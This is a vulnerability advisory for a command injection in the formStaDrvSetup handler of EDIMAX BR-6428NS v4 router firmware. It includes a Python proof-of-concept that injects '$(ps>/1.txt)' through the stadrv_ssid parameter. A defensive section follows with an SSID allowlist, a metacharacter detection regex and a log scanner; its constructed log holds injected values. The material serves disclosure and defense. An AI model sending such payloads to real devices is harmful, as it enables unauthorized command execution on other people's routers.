BR-6428NS_v4_1.10
The EDIMAX BR-6428NS_v4_1.10 firmware has a command injection vulnerability in the formStaDrvSetup function. The v11 variable receives the stadrv_ssid parameter from a POST request. Because the user controls the value of this variable and it is passed to a system() call without sanitization, the statement can cause a command injection.


```python
import requests

# Router LAN address (default management IP of the device)
ip = "192.168.2.1"

# Value submitted as the SSID; it reaches system() unsanitized
payload = "$(ps>/1.txt)"

# POST parameters consumed by formStaDrvSetup
data = {
    "stadrv_type": "1",
    "stadrv_band": "1",
    "stadrv_chan": "19",
    "stadrv_ssid": payload
}

url = f'http://{ip}/goform/formStaDrvSetup'
res = requests.post(url=url, data=data, verify=False)
print(res)
```
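As an added example (not part of the advisory and not the vendor's firmware code), the following Python shows the two checks a defender would want around this endpoint: an allowlist that a hardened handler should apply to stadrv_ssid before the value is ever placed in a shell command, and a detector that scans request logs for POSTs to /goform/formStaDrvSetup whose SSID field carries shell metacharacters. The log format, the source addresses and the timestamps are constructed for the example; the path and parameter names are the ones from the advisory.

```python
import re
from urllib.parse import parse_qs

# Endpoint and parameter named in the advisory.
VULN_PATH = "/goform/formStaDrvSetup"
VULN_PARAM = "stadrv_ssid"

# Characters that let a value break out of a command string that is
# handed to system(). Any of them inside an SSID field sent to the
# vulnerable handler is a strong injection indicator.
SHELL_META = re.compile(r'[;&|`$(){}<>\n\r\\]')

# Allowlist a hardened handler should enforce before building a shell
# command: printable characters minus the metacharacters above, 1..32 long
# (the 802.11 SSID length limit). Constructed policy, not the vendor's.
SAFE_SSID = re.compile(r'^[A-Za-z0-9 _.\-]{1,32}$')

# Constructed log: "<timestamp> <source-ip> <method> <path> <urlencoded-body>".
# The second line carries the advisory's payload, URL-encoded.
CONSTRUCTED_LOG = """\
2024-01-01T10:00:01Z 192.168.2.50 POST /goform/formStaDrvSetup stadrv_type=1&stadrv_band=1&stadrv_chan=19&stadrv_ssid=HomeNet-5G
2024-01-01T10:00:07Z 192.168.2.77 POST /goform/formStaDrvSetup stadrv_type=1&stadrv_band=1&stadrv_chan=19&stadrv_ssid=%24%28ps%3E%2F1.txt%29
2024-01-01T10:00:09Z 192.168.2.77 POST /goform/formWlanSetup ssid=a%3Bid
"""


def is_safe_ssid(value: str) -> bool:
    """Allowlist check: True only if the SSID contains nothing a shell could interpret."""
    return SAFE_SSID.fullmatch(value) is not None


def inspect_request(path: str, body: str) -> dict:
    """Classify one POST body; parse_qs performs the URL-decoding for us."""
    params = parse_qs(body, keep_blank_values=True)
    ssid = params.get(VULN_PARAM, [""])[0]
    suspicious = path == VULN_PATH and SHELL_META.search(ssid) is not None
    return {"path": path, "ssid": ssid, "suspicious": suspicious}


def scan_log(lines):
    """Return one alert dict per log line that targets the vulnerable handler with metacharacters."""
    alerts = []
    for line in lines:
        parts = line.split(" ")
        if len(parts) != 5:
            continue  # not in the constructed format; skip rather than crash
        ts, src, method, path, body = parts
        if method != "POST":
            continue
        verdict = inspect_request(path, body)
        if verdict["suspicious"]:
            alerts.append({"ts": ts, "src": src, "ssid": verdict["ssid"]})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(CONSTRUCTED_LOG.splitlines()):
        print(f"{alert['ts']} {alert['src']} injection attempt via {VULN_PARAM}={alert['ssid']!r}")
```

The detector deliberately keys on the specific path: the same metacharacters in an unrelated form (the third constructed line) are not flagged, which keeps the alert tied to the sink the advisory describes. On the firmware side, rejecting any SSID that fails is_safe_ssid, or better, avoiding system() entirely in favour of an exec-style call with an argument vector, removes the injection regardless of what the client sends.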
